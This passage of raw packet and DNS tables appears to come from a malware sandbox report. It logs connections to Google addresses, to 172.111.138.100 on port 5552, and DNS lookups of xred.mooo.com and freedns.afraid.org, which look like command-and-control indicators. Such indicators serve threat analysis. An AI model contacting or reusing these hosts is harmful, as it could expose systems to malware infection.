                                                                                                                Dec 30, 2024 10:58:32.404375076 CET59937443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:32.404383898 CET44359937142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.405647039 CET59933443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:32.405656099 CET44359933216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.406039000 CET59933443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:32.406044960 CET44359933216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.532145977 CET44359941142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.533866882 CET59941443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:32.588313103 CET59941443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:32.588331938 CET44359941142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.588519096 CET59941443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:32.588524103 CET44359941142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.748517990 CET44359934216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.749537945 CET44359934216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.749733925 CET59934443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:32.772643089 CET44359933216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.773564100 CET59933443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:32.773590088 CET44359933216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.773639917 CET59933443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:32.773900032 CET44359933216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.773942947 CET44359933216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.773997068 CET59933443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:32.796575069 CET44359937142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.796726942 CET44359937142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.796792984 CET59937443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:32.796811104 CET44359937142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.796850920 CET59937443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:32.796863079 CET44359937142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.796902895 CET59937443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:32.796937943 CET44359937142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.797030926 CET44359937142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.797075033 CET59937443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:32.810771942 CET59937443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:32.810811996 CET59933443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:32.810939074 CET59941443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:32.811110973 CET59934443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:32.811125040 CET44359934216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.811141014 CET59934443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:32.811186075 CET59934443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:32.812069893 CET59942443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:32.812112093 CET44359942216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.812236071 CET59942443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:32.812433004 CET59943443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:32.812473059 CET44359943216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.812573910 CET59943443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:32.812983036 CET59943443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:32.812999010 CET44359943216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.813267946 CET59942443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:32.813280106 CET44359942216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.813641071 CET59944443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:32.813673019 CET44359944142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:32.813796043 CET59944443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:32.814393044 CET59944443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:32.814404964 CET44359944142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:33.412431002 CET44359942216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:33.412575960 CET59942443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:33.413165092 CET44359944142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:33.413258076 CET59944443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:33.421472073 CET44359943216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:33.421597958 CET59943443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:33.438857079 CET59942443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:33.438864946 CET44359942216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:33.439076900 CET59942443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:33.439081907 CET44359942216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:33.439426899 CET59944443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:33.439435959 CET44359944142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:33.439552069 CET59944443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:33.439555883 CET44359944142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:33.441008091 CET59943443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:33.441023111 CET44359943216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:33.441232920 CET59943443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:33.441246033 CET44359943216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:33.783026934 CET44359942216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:33.783083916 CET59942443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:33.783107996 CET44359942216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:33.783201933 CET59942443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:33.783330917 CET59942443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:33.783365011 CET44359942216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:33.783417940 CET59942443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:33.783953905 CET59956443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:33.783976078 CET44359956142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:33.784025908 CET59956443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:33.784259081 CET59957443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:33.784271002 CET44359957216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:33.784344912 CET59957443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:33.784822941 CET59957443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:33.784832954 CET44359957216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:33.785198927 CET59956443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:33.785208941 CET44359956142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:33.800359964 CET44359943216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:33.800432920 CET59943443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:33.800453901 CET44359943216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:33.800493002 CET59943443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:33.800584078 CET59943443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:33.800631046 CET44359943216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:33.800765991 CET44359943216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:33.800811052 CET59943443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:33.800827026 CET59943443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:33.801517010 CET59958443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:33.801549911 CET44359958216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:33.801620007 CET59958443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:33.801829100 CET59958443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:33.801842928 CET44359958216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:33.811362028 CET44359944142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:33.811414003 CET44359944142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:33.811413050 CET59944443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:33.811434984 CET44359944142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:33.811450005 CET59944443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:33.811491013 CET59944443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:33.811496019 CET44359944142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:33.811528921 CET44359944142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:33.811539888 CET59944443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:33.811566114 CET59944443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:33.828202963 CET59944443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:33.828217030 CET44359944142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:33.828635931 CET59959443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:33.828674078 CET44359959142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:33.828735113 CET59959443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:33.828917027 CET59959443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:33.828933001 CET44359959142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:34.403345108 CET44359956142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:34.403415918 CET59956443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:34.403736115 CET59956443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:34.403740883 CET44359956142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:34.404865026 CET44359958216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:34.405020952 CET59958443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:34.405605078 CET44359958216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:34.405661106 CET59956443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:34.405664921 CET44359956142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:34.405688047 CET59958443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:34.409842014 CET59958443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:34.409852028 CET44359958216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:34.410080910 CET44359958216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:34.410187006 CET59958443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:34.410274029 CET44359957216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:34.410362005 CET59957443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:34.410763025 CET59958443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:34.411858082 CET44359957216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:34.411931038 CET59957443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:34.413748980 CET59957443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:34.413753033 CET44359957216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:34.414146900 CET44359957216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:34.414242983 CET59957443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:34.414817095 CET59957443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:34.439538002 CET44359959142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:34.439680099 CET59959443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:34.440937996 CET59959443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:34.440958023 CET44359959142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:34.441173077 CET59959443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:34.441179991 CET44359959142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:34.455333948 CET44359958216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:34.455372095 CET44359957216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:34.776103973 CET44359958216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:34.776624918 CET59958443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:34.776987076 CET44359958216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:34.777029037 CET44359958216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:34.777407885 CET59958443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:34.777430058 CET44359958216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:34.777441978 CET59958443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:34.777441978 CET59958443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:34.777498960 CET59958443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:34.777807951 CET44359957216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:34.778019905 CET59957443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:34.778028965 CET44359957216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:34.778060913 CET59966443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:34.778107882 CET44359966216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:34.778121948 CET59957443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:34.778201103 CET44359957216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:34.778222084 CET59966443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:34.778333902 CET59957443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:34.778352022 CET44359957216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:34.778449059 CET59957443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:34.778604031 CET59957443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:34.778605938 CET59966443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:34.778616905 CET44359957216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:34.778635979 CET44359966216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:34.779392958 CET59967443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:34.779436111 CET44359967216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:34.782843113 CET59967443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:34.783138037 CET59967443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:34.783153057 CET44359967216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:34.817630053 CET44359956142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:34.817691088 CET44359956142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:34.817761898 CET59956443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:34.817761898 CET59956443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:34.817771912 CET44359956142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:34.818206072 CET59956443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:34.818922043 CET59956443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:34.818939924 CET44359956142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:34.819360018 CET59968443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:34.819397926 CET44359968142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:34.819540977 CET59968443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:34.819792032 CET59968443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:34.819804907 CET44359968142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:34.960382938 CET44359959142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:34.960431099 CET44359959142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:34.960465908 CET59959443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:34.960500002 CET44359959142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:34.960526943 CET59959443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:34.960789919 CET59959443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:34.960807085 CET44359959142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:34.960844994 CET44359959142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:34.961344004 CET59959443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:34.966414928 CET59959443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:34.966438055 CET44359959142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:34.967256069 CET59969443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:34.967277050 CET44359969142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:34.967439890 CET59969443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:34.967777967 CET59969443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:34.967788935 CET44359969142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:35.378447056 CET44359966216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:35.380671024 CET59966443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:35.387607098 CET44359967216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:35.387696981 CET59967443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:35.422009945 CET44359968142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:35.424691916 CET59968443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:35.453915119 CET59966443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:35.453927994 CET44359966216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:35.454225063 CET59966443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:35.454238892 CET44359966216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:35.454586983 CET59967443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:35.454602003 CET44359967216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:35.454790115 CET59967443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:35.454793930 CET44359967216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:35.458005905 CET59968443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:35.458019018 CET44359968142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:35.458290100 CET59968443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:35.458295107 CET44359968142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:35.570683002 CET44359969142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:35.570885897 CET59969443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:35.750382900 CET44359966216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:35.750483036 CET59966443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:35.750504971 CET44359966216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:35.750555038 CET59966443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:35.751269102 CET44359966216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:35.751319885 CET44359966216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:35.751363993 CET59966443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:35.752676010 CET44359967216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:35.752739906 CET59967443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:35.752753019 CET44359967216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:35.752857924 CET59967443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:35.753777027 CET44359967216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:35.753833055 CET59967443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:35.753923893 CET44359967216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:35.753981113 CET59967443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:35.827028036 CET44359968142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:35.827069044 CET44359968142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:35.827158928 CET44359968142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:35.827173948 CET59968443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:35.828675032 CET59968443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:40.203596115 CET804970869.42.215.252192.168.2.7
                                                                                                                Dec 30, 2024 10:58:40.203676939 CET4970880192.168.2.769.42.215.252
                                                                                                                Dec 30, 2024 10:58:45.869837999 CET59966443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:45.869879961 CET44359966216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:45.870246887 CET59967443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:45.870285034 CET44359967216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:45.872992039 CET60042443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:45.873020887 CET44360042216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:45.873148918 CET60042443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:45.873256922 CET59969443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:45.873272896 CET44359969142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:45.873496056 CET60043443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:45.873526096 CET44360043216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:45.873545885 CET59969443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:45.873549938 CET44359969142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:45.873589039 CET60043443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:45.873836994 CET60042443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:45.873852968 CET44360042216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:45.873872042 CET60043443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:45.873884916 CET44360043216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:45.873943090 CET59968443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:45.873965025 CET44359968142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:46.197977066 CET44359969142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:46.198018074 CET44359969142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:46.198024988 CET59969443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:46.198034048 CET44359969142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:46.198065042 CET59969443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:46.198112011 CET44359969142.250.181.225192.168.2.7
                                                                                                                Dec 30, 2024 10:58:46.198143005 CET59969443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:46.198191881 CET59969443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:46.473006964 CET44360043216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:46.473190069 CET60043443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:46.474586010 CET44360042216.58.206.46192.168.2.7
                                                                                                                Dec 30, 2024 10:58:46.474726915 CET60042443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:50.451961040 CET4970880192.168.2.769.42.215.252
                                                                                                                Dec 30, 2024 10:58:50.453593969 CET59969443192.168.2.7142.250.181.225
                                                                                                                Dec 30, 2024 10:58:50.453654051 CET60043443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:50.453701019 CET60042443192.168.2.7216.58.206.46
                                                                                                                Dec 30, 2024 10:58:59.134243965 CET555249728172.111.138.100192.168.2.7
                                                                                                                Dec 30, 2024 10:58:59.177408934 CET497285552192.168.2.7172.111.138.100
                                                                                                                Dec 30, 2024 10:59:35.571822882 CET555249728172.111.138.100192.168.2.7
                                                                                                                Dec 30, 2024 10:59:35.615364075 CET497285552192.168.2.7172.111.138.100
                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Dec 30, 2024 10:58:08.755585909 CET4988853192.168.2.71.1.1.1
                                                                                                                Dec 30, 2024 10:58:08.762170076 CET53498881.1.1.1192.168.2.7
                                                                                                                Dec 30, 2024 10:58:09.589566946 CET5101853192.168.2.71.1.1.1
                                                                                                                Dec 30, 2024 10:58:09.596779108 CET53510181.1.1.1192.168.2.7
                                                                                                                Dec 30, 2024 10:58:09.605763912 CET6270253192.168.2.71.1.1.1
                                                                                                                Dec 30, 2024 10:58:09.612328053 CET53627021.1.1.1192.168.2.7
                                                                                                                Dec 30, 2024 10:58:09.821223974 CET5999253192.168.2.71.1.1.1
                                                                                                                Dec 30, 2024 10:58:09.829541922 CET53599921.1.1.1192.168.2.7
                                                                                                                Dec 30, 2024 10:58:16.228404999 CET6214253192.168.2.71.1.1.1
                                                                                                                Dec 30, 2024 10:58:16.235618114 CET53621421.1.1.1192.168.2.7
                                                                                                                Dec 30, 2024 10:58:20.715626955 CET53606401.1.1.1192.168.2.7
                                                                                                                Dec 30, 2024 10:58:20.970328093 CET5518353192.168.2.71.1.1.1
                                                                                                                Dec 30, 2024 10:58:20.977950096 CET53551831.1.1.1192.168.2.7
                                                                                                                Dec 30, 2024 10:58:26.657561064 CET5825353192.168.2.71.1.1.1
                                                                                                                Dec 30, 2024 10:58:26.664838076 CET53582531.1.1.1192.168.2.7
                                                                                                                Dec 30, 2024 10:58:33.522968054 CET5261753192.168.2.71.1.1.1
                                                                                                                Dec 30, 2024 10:58:33.530014992 CET53526171.1.1.1192.168.2.7
                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                Dec 30, 2024 10:58:08.755585909 CET192.168.2.71.1.1.10xff7cStandard query (0)docs.google.comA (IP address)IN (0x0001)false
                                                                                                                Dec 30, 2024 10:58:09.589566946 CET192.168.2.71.1.1.10x7d74Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                Dec 30, 2024 10:58:09.605763912 CET192.168.2.71.1.1.10xbff3Standard query (0)freedns.afraid.orgA (IP address)IN (0x0001)false
                                                                                                                Dec 30, 2024 10:58:09.821223974 CET192.168.2.71.1.1.10x570dStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                Dec 30, 2024 10:58:16.228404999 CET192.168.2.71.1.1.10xe367Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
